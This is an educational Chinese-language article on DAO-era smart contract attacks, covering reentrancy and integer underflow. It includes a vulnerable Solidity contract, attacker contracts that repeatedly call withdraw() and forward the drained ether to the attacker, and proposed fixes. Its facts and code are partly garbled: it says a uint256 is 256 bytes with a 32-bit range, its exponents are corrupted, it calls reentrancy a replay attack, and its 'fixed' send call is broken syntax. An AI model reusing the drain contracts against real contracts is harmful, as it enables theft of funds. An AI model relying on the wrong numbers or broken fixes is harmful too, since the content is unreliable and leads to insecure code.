如果你在數字貨幣世界待過足夠時間，也許你聽說過1或2個智能合約攻擊時間，這些攻擊導致了幾千萬美元的盜竊損失。最著名的攻擊是DAO事件，這是數字貨幣世界最受期待的項目之一，同時也是智能合約的改革。雖然很多人聽說過這些攻擊，但是很少人知道到底發生了什么，是怎么發生的，以及如何避免這些錯誤。

智能合約是動態的，復雜的以及難以置信地強大。雖然他們的潛力是很難想象，但是也不可能一夜之間就成為了攻擊的對象。也就是說，對于往后的數字貨幣，我們可以從之前的錯誤中學到經驗，然后一起成長。雖然DAO是已經發生的事情，但是這對于開發者，投資者，以及社區成員對于智能合約攻擊來說，都是一個很好的例子。

今天，我想和大家聊聊從DAO事件中，我們學到的3件事。

攻擊＃1：重入攻擊

當攻擊者通過對目標調用提款操作的時候，重入攻擊就會發生，就好像DAO事件一樣。當合約不能在發出資金之前更新狀態（用戶余額），攻擊者就可以連續進行提取函數調用，來獲得合約中的資金。任何時候攻擊者獲得以太幣，他的合約都會自動地調用反饋函數，function （），這就再次調用了提現合約。這時候，攻擊就會進入遞歸回路，這時候這個合約中的資金就會轉入攻擊者。因為目標合約都在不停地調用攻擊者的函數，這個合約也不會更新攻擊者的余額。當前的合約不會發現有任何問題，更清楚地說，合約函數中包含反饋函數，當合約收到以太幣和零數據的時候，合約函數就會自動執行。

攻擊流程

1．攻擊者將以太幣存入目標函數

2．目標函數就會根據存入的以太幣而更新攻擊者的約

3．攻擊者請求拿回資金

4．資金就會退回

5．攻擊者的反饋函數生效，然后調用提現功能

6．智能合約的邏輯就會更新攻擊者的余額，因為提現又被成功調用

7．資金發送到攻擊者

8．第5－7步重復使用

9．一旦攻擊結束，攻擊者就會把資金從他們自己的合約發送到個人地址

1＊UeDgMZo2n0skHzgkl352zQ

重入攻擊的遞歸回路

很不幸地是，一旦這個攻擊開始，無法停下。攻擊者的提現功能會被一次次地調用，直到合約中的燃料跑完，或者被害者的以太幣余額被消耗光。

代碼

下面就是DAO合約的簡單版本，其中會包括一些介紹來為這些不熟悉代碼／ solidity語言更好地理解合約。

contract babyDAO ｛

／＊ assign key／value pair so we can look up

credit integers with an ETH address ＊／

mapping （address ＝＞ uint256） public credit；

／＊ a function for funds to be added to the contract，

sender will be credited amount sent ＊／

function donate（address to） payable ｛

credit［msg．sender］ ＋＝ msg．value；

｝

／＊show ether credited to address＊／

function assignedCredit（address） returns （uint） ｛

return credit［msg．sender］；

｝

／＊withdrawal ether from contract＊／

function withdraw（uint amount） ｛

if （credit［msg．sender］ ＞＝ amount） ｛

msg．sender．call．value（amount）（）；

credit［msg．sender］ －＝ amount；

｝

｝

｝

如果我們看下函數withdraw（），我們可以看到DAO合約使用address．call．value（）來發送資金到msg．sender。不僅如此，在資金發出后，合約會更新credit［msg．sender］的狀態。攻擊者在發現了合約代碼中的問題，就能夠使用類似下面的ThisIsAHodlUp ｛｝來將資金轉入contract babyDAO｛｝合約。

import ‘browser／babyDAO．sol’；

contract ThisIsAHodlUp ｛

／＊ assign babyDAO contract as ＂dao＂ ＊／

babyDAO public dao ＝ babyDAO（0x2ae．．．）；

address owner；

／＊assign contract creator as owner＊／

constructor（ThisIsAHodlUp） public ｛

owner ＝ msg．sender；

｝

／＊fallback function， withdraws funds from babyDAO＊／

function（） public ｛

dao．withdraw（dao．assignedCredit（this））；

｝

／＊send drained funds to attacker’s address＊／

function drainFunds（） payable public｛

owner．transfer（address（this）．balance）；

｝

｝

需要注意地是，這個后退函數，function（），會調用DAO或者babyDAO｛｝的提現函數，來從合約中盜取資金。從另個方面來說，當攻擊者想要把所有偷竊來的資金賺到他們的地址，drainFunds（）功能會被調用。

解決方案

現在，我們應該清楚重放攻擊會利用兩個特別的智能合約漏洞。第一個是當合約的狀態在資金發出之后，而不是之前進行更新。由于在發出資金前無法更新合約狀態，函數就會在中間計算的時候被打斷，合約也認為資金其實還沒有發出。第二個漏洞就當合約錯誤地使用address．call．value（）來發出資金，而不是address．transfer（） 或者 address．send（）。這兩個都受限于2300gas，只記錄一個事件而不是多個外部調用。

contract babyDAO｛

．．．．

function withdraw（uint amount） ｛

if （credit［msg．sender］ ＞＝ amount） ｛

credit［msg．sender］ －＝ amount； ／＊ updates balance first ＊／

msg．sender．send（amount）（）； ／＊ send funds properly ＊／

｝

｝

攻擊2：下溢攻擊

雖然DAO合約不會讓受害者掉入下溢攻擊，我們能夠通過現有的babyDAO contract｛｝來更好地理解這些攻擊為什么會發生。

首先，我們需要理解什么是256單位制。一個256單位制是由256個字節組成。以太坊的虛擬機是使用256字節來完成的。因為以太坊虛擬機受限于256字節的大小，所以數字的范圍是0到4，294，967，295 （22？？）。如果我們超過這個范圍，那么數字就會重置到范圍的最底部（22？？ ＋ 1 ＝ 0）。如果我們低于這個范圍，這個數字就會重置到這個范圍的頂端（0–1＝ 22？？）。

當我們從零中減去大于零的數，就會發生下溢攻擊，導致一個新的22？？數集。現在，如果攻擊者的余額發生了下溢，那么這部分余額就會更新，從而導致整個資金被盜。

攻擊流程

攻擊者通過發出1Wei到目標合約，來啟動攻擊。

合約認證發出資金的人

隨后調用1Wei的提現函數

合約會從發送者的賬戶扣除的1Wei，現在賬戶余額又是零

因為目標合約將以太幣發給攻擊者，攻擊者的退回函數被處罰，所以提現函數又被調用。

提現1Wei的事件被記錄

攻擊者合約的余額就會更新兩次，第一次是到零，第二次是到－1。

攻擊者的余額回置到22？？

攻擊者通過提現目標合約的所有資金，從而完成整個攻擊

代碼

／＊donate 1 wei， withdraw 1 wei＊／

function attack（） ｛

dao．donate．value（1）（this）；

dao．withdraw（1）；

｝

／＊fallback function， results in 0–1 ＝ 2＊＊256 ＊／

function（） ｛

if （performAttack） ｛

performAttack ＝ false；

dao．withdraw（1）；

｝

｝

／＊extract balance from smart contract＊／

function getJackpot（） ｛

dao．withdraw（dao．balance）；

owner．send（this．balance）；

｝

｝

解決方案

為了防止受害人陷入下溢攻擊，最好的方法是看更新的狀態是否在字節范圍內。我們可以添加參數來檢查我們的代碼，作為最后一層保護。函數withdraw（）的首行代碼是為了檢查是否有足夠的資金，第二行是為了檢查超溢，第三個是檢查下溢。

contract babysDAO｛

．．．．

／＊withdrawal ether from contract＊／

function withdraw（uint amount） ｛

if （credit［msg．sender］ ＞＝ amount

＆＆ credit［msg．sender］ ＋ amount ＞＝ credit［msg．sender］

＆＆ credit［msg．sender］ － amount ＜＝ credit［msg．sender］） ｛

credit［msg．sender］ －＝ amount；

msg．sender．send（amount）（）；

｝

｝

需要注意，就像我們之前討論，我們上面的代碼是在發出資金之前更新用戶的余額。